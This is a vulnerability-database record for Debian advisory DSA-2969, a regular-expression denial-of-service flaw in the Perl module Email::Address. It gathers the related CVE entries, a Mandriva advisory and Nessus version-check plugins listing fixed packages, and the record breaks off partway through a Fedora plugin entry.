ID DSA-2969 Type debian Reporter Debian Modified 2014-06-27T00:00:00
Description
Bastian Blank reported a denial of service vulnerability in Email::Address, a Perl module for RFC 2822 address parsing and creation. Email::Address::parse used significant time on parsing empty quoted strings. A remote attacker able to supply specifically crafted input to an application using Email::Address for parsing, could use this flaw to mount a denial of service attack against the application.
For the stable distribution (wheezy), this problem has been fixed in version 1.895-1+deb7u1.
For the testing distribution (jessie), this problem has been fixed in version 1.905-1.
For the unstable distribution (sid), this problem has been fixed in version 1.905-1.
We recommend that you upgrade your libemail-address-perl packages.
{"edition": 1, "affectedPackage": [{"packageFilename": "libemail-address-perl_1.895-1+deb7u1_all.deb", "OS": "Debian GNU/Linux", "arch": "all", "OSVersion": "7", "packageName": "libemail-address-perl", "packageVersion": "1.895-1+deb7u1", "operator": "lt"}], "type": "debian", "bulletinFamily": "unix", "reporter": "Debian", "title": "libemail-address-perl -- security update", "references": [], "modified": "2014-06-27T00:00:00", "description": "Bastian Blank reported a denial of service vulnerability in Email::Address, a Perl module for RFC 2822 address parsing and creation. Email::Address::parse used significant time on parsing empty quoted strings. A remote attacker able to supply specifically crafted input to an application using Email::Address for parsing, could use this flaw to mount a denial of service attack against the application.\n\nFor the stable distribution (wheezy), this problem has been fixed in version 1.895-1+deb7u1.\n\nFor the testing distribution (jessie), this problem has been fixed in version 1.905-1.\n\nFor the unstable distribution (sid), this problem has been fixed in version 1.905-1.\n\nWe recommend that you upgrade your libemail-address-perl packages.", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "viewCount": 0, "published": "2014-06-27T00:00:00", "lastseen": "2016-09-02T18:36:14", "id": "DSA-2969", "hash": "36989021117f244a045a6b16938538605022d9112cc7d12f33c39f7e10b850a3", "cvelist": ["CVE-2014-4720", "CVE-2014-0477"], "objectVersion": "1.2", "history": [], "href": "http://www.debian.org/security/dsa-2969", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}
{"cve": [{"lastseen": "2016-09-03T20:43:00", "references": ["http://seclists.org/oss-sec/2014/q2/563", "https://github.com/rjbs/Email-Address/blob/master/Changes"], "edition": 1, "description": "Email::Address module before 1.904 for Perl uses an inefficient regular expression, which allows remote attackers to cause a denial of service (CPU consumption) via vectors related to \"backtracking into the phrase,\" a different vulnerability than CVE-2014-0477.", "reporter": "NVD", "published": "2014-07-06T19:55:02", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CVE-2014-4720", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-4720"], "scanner": [], "modified": "2014-07-07T10:52:15", "cpe": ["cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.889::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.897::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.870::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.882::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.2::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.871::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.899::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.898::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.888::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.890::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.885::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.883::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.887::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.7::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.880::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.1::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.80::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.891::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.894::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.901::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.892::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.896::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.5::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.886::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.893::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.85::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.895::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.903::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.6::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.884::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.902::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.881::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.3::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.900::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.86::~~~perl~~"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4720", "id": "CVE-2014-4720", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-03T19:51:54", "references": ["https://github.com/rjbs/Email-Address/commit/83f8306117115729ac9346523762c0c396251eb5", "http://www.debian.org/security/2014/dsa-2969", "http://seclists.org/oss-sec/2014/q2/563", "https://metacpan.org/release/RJBS/Email-Address-1.905", "https://bugzilla.redhat.com/show_bug.cgi?id=1110723", "https://github.com/rjbs/Email-Address/blob/master/Changes"], "edition": 1, "description": "The parse function in Email::Address module before 1.905 for Perl uses an inefficient regular expression, which allows remote attackers to cause a denial of service (CPU consumption) via an empty quoted string in an RFC 2822 address.", "reporter": "NVD", "published": "2014-07-03T13:55:05", "title": "CVE-2014-0477", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-0477"], "scanner": [], "modified": "2015-11-04T14:00:07", "cpe": ["cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.889::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.897::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.870::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.882::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.2::~~~perl~~", "cpe:/o:fedoraproject:fedora", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.871::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.899::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.898::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.888::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.890::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.904::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.885::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.883::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.887::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.7::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.880::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.1::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.80::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.891::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.894::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.901::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.892::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.896::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.5::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.886::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.893::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.85::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.895::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.903::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.6::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.884::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.902::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.881::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.3::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.900::~~~perl~~", "cpe:/a:email%3a%3aaddress_module_project:email%3a%3aaddress:1.86::~~~perl~~"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0477", "id": "CVE-2014-0477", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31187"], "description": "resources exhaustion on address parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-10-14T00:00:00", "title": "perl-Email-Address DoS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:57", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-4720", "CVE-2014-0477"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14012", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14012", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:192\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : perl-Email-Address\r\n Date : October 1, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated perl-Email-Address package fixes security vulnerability:\r\n \r\n The parse function in Email::Address module before 1.905 for Perl\r\n uses an inefficient regular expression, which allows remote attackers\r\n to cause a denial of service (CPU consumption) via an empty quoted\r\n string in an RFC 2822 address (CVE-2014-0477).\r\n \r\n The Email::Address module before 1.904 for Perl uses an inefficient\r\n regular expression, which allows remote attackers to cause a denial\r\n of service (CPU consumption) via vectors related to backtracking into\r\n the phrase (CVE-2014-4720).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0477\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4720\r\n http://advisories.mageia.org/MGASA-2014-0389.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n f45326dac151e5154f2f13a6942d4f16 mbs1/x86_64/perl-Email-Address-1.895.0-2.1.mbs1.noarch.rpm \r\n a889b50000a684108955b439e4ca02db mbs1/SRPMS/perl-Email-Address-1.895.0-2.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUK/fNmqjQ0CJFipgRAtWrAJ9CmAobU9TL5x0+jFEhhDwbvIalRwCfTPn6\r\nC57L8lqxJPqP/vkUCCzshN4=\r\n=S0uC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:192 ] perl-Email-Address", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-4720", "CVE-2014-0477"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31187", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31187", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:48:33", "references": ["http://advisories.mageia.org/MGASA-2014-0389.html"], "pluginID": "78018", "description": "Updated perl-Email-Address package fixes security vulnerability :\n\nThe parse function in Email::Address module before 1.905 for Perl uses an inefficient regular expression, which allows remote attackers to cause a denial of service (CPU consumption) via an empty quoted string in an RFC 2822 address (CVE-2014-0477).\n\nThe Email::Address module before 1.904 for Perl uses an inefficient regular expression, which allows remote attackers to cause a denial of service (CPU consumption) via vectors related to backtracking into the phrase (CVE-2014-4720).", "edition": 5, "reporter": "Tenable", "published": "2014-10-02T00:00:00", "title": "Mandriva Linux Security Advisory : perl-Email-Address (MDVSA-2014:192)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4720", "CVE-2014-0477"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:perl-Email-Address"], "id": "MANDRIVA_MDVSA-2014-192.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78018", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:192. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78018);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-0477\", \"CVE-2014-4720\");\n script_bugtraq_id(68084, 68446);\n script_xref(name:\"MDVSA\", value:\"2014:192\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl-Email-Address (MDVSA-2014:192)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl-Email-Address package fixes security vulnerability :\n\nThe parse function in Email::Address module before 1.905 for Perl uses\nan inefficient regular expression, which allows remote attackers to\ncause a denial of service (CPU consumption) via an empty quoted string\nin an RFC 2822 address (CVE-2014-0477).\n\nThe Email::Address module before 1.904 for Perl uses an inefficient\nregular expression, which allows remote attackers to cause a denial of\nservice (CPU consumption) via vectors related to backtracking into the\nphrase (CVE-2014-4720).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0389.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-Email-Address package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Email-Address\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-Email-Address-1.895.0-2.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:08:10", "references": ["http://www.debian.org/security/2014/dsa-2969", "https://packages.debian.org/source/wheezy/libemail-address-perl"], "pluginID": "76286", "description": "Bastian Blank reported a denial of service vulnerability in Email::Address, a Perl module for RFC 2822 address parsing and creation. Email::Address::parse used significant time on parsing empty quoted strings. A remote attacker able to supply specifically crafted input to an application using Email::Address for parsing, could use this flaw to mount a denial of service attack against the application.", "edition": 4, "reporter": "Tenable", "published": "2014-06-28T00:00:00", "title": "Debian DSA-2969-1 : libemail-address-perl - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4720", "CVE-2014-0477"], "modified": "2015-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libemail-address-perl", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2969.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76286", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2969. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76286);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/02/16 15:48:47 $\");\n\n script_cve_id(\"CVE-2014-0477\", \"CVE-2014-4720\");\n script_bugtraq_id(68084);\n script_xref(name:\"DSA\", value:\"2969\");\n\n script_name(english:\"Debian DSA-2969-1 : libemail-address-perl - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bastian Blank reported a denial of service vulnerability in\nEmail::Address, a Perl module for RFC 2822 address parsing and\ncreation. Email::Address::parse used significant time on parsing empty\nquoted strings. A remote attacker able to supply specifically crafted\ninput to an application using Email::Address for parsing, could use\nthis flaw to mount a denial of service attack against the application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libemail-address-perl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-2969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libemail-address-perl packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.895-1+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libemail-address-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libemail-address-perl\", reference:\"1.895-1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:08", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=883225", "http://lists.opensuse.org/opensuse-updates/2014-10/msg00032.html"], "pluginID": "78720", "description": "This update fixes a denial of service vulnerability when parsing an empty quoted string (CVE-2014-0477)", "edition": 4, "reporter": "Tenable", "published": "2014-10-29T00:00:00", "title": "openSUSE Security Update : perl-Email-Address (openSUSE-SU-2014:1328-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2014-10-30T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:perl-Email-Address", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-604.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78720", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-604.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78720);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2014/10/30 10:38:48 $\");\n\n script_cve_id(\"CVE-2014-0477\");\n\n script_name(english:\"openSUSE Security Update : perl-Email-Address (openSUSE-SU-2014:1328-1)\");\n script_summary(english:\"Check for the openSUSE-2014-604 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a denial of service vulnerability when parsing an\nempty quoted string (CVE-2014-0477)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-10/msg00032.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883225\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-Email-Address package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-Email-Address\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-Email-Address-1.892-11.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"perl-Email-Address-1.899-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-Email-Address\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:47:54", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1110723", "http://www.nessus.org/u?38270691"], "pluginID": "77946", "description": "Update to 1.905 to fix CVE-2014-0477.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2014-09-29T00:00:00", "title": "Fedora 19 : perl-Email-Address-1.905-1.fc19 (2014-7610)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2015-10-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl-Email-Address", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-7610.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7610.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 